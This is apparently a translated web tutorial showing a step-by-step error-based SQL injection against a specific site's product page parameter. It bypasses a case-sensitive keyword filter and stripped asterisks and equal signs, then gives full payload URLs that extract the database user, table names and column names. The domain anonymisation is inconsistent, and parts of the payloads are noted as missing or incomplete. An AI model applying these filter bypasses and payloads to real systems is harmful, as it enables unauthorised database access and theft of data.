The target site's domain has been replaced with www.cnseay.com throughout.
Open the site, open a product page, and append a single quote to the id parameter, e.g. ?id=62'.
From the response it can be determined that the id parameter is not wrapped in single quotes in the SQL statement, and that magic_quotes_gpc is on. Since the injection point is numeric, the easiest course is simply to avoid single quotes altogether.
However, testing turned up the following problems:
1. Common injection keywords such as union, select and from, as well as asterisks (*) and equal signs (=), are stripped (replaced with the empty string).
2. The parameter is used in several SQL statements, and only the first of them can be exploited with double-query (error-based) injection.
Now that we know the limitations, we can work on bypassing them.
Testing shows that the keyword filter is case-sensitive: union, select and from pass through untouched when written in mixed case such as selecT or fRom.
So we can use a double query to read data. The commonly used double-query statement is (parentheses repaired here):
(select 1 from (select count(*), concat(floor(rand(0)*2), (select user())) a from information_schema.tables group by a) b)
This contains two asterisks, and asterisks are stripped, so we have to do without them.
The first asterisk, in count(*), is easy: replace it with count(1).
The second, in floor(rand(0)*2), needs a moment's thought. Multiplying by 2 is the same as dividing by 0.5, so rand(0)*2 becomes rand(0)/0.5, with no asterisk.
That leaves the equal sign. Instead of an equality test we can compare with > or <, which are not filtered.
So the final statement is:
http://www.2cto.com/show_content.php?id=62 anD cate_parent>(selecT 1 fRom (selecT count(1), concat(floor(rand(0)/0.5), (select USER())) a frOm information_schema.tables gRoup by a) B)-1
What about reading data from other tables? The usual statement would be:
union select 1, 2, ..., group_concat(table_name) from information_schema.tables where table_schema = database()
That has an equal sign in it. How do we get around that?
Use in () instead of =: table_schema in (database()).
Dumping table names:
http://www.cnseay.com/show_content.php?id=62 anD cate_parent>(selecT 1 fRom (selecT count(1), concat(floor(rand(0)/0.5), (selEct table_name fRom information_schema.tables wHere table_schema in (database()) limIt 0,1)) a frOm information_schema.tables gRoup by a) B)-1
Dumping column names:
http://www.cnseay.com/show_content.php?id=62 anD cate_parent>(selecT 1 fRom (selecT count(1), concat(floor(rand(0)/0.5), (selEct column_name fRom information_schema.columns whEre table_name in (char(101,100,117,99,109,115,100,109,105,110,)) aNd table_schema in (database()) limIt 0,1)) a frOm information_schema.tables gRoup by a) b)-1
(The LIMIT arguments were lost from the page; LIMIT 0,1 is assumed here. The inner subquery must return exactly one row, so increase the offset, LIMIT 1,1, LIMIT 2,1 and so on, to walk through the remaining rows one at a time. The char() list encoding the table name is also incomplete on the page.)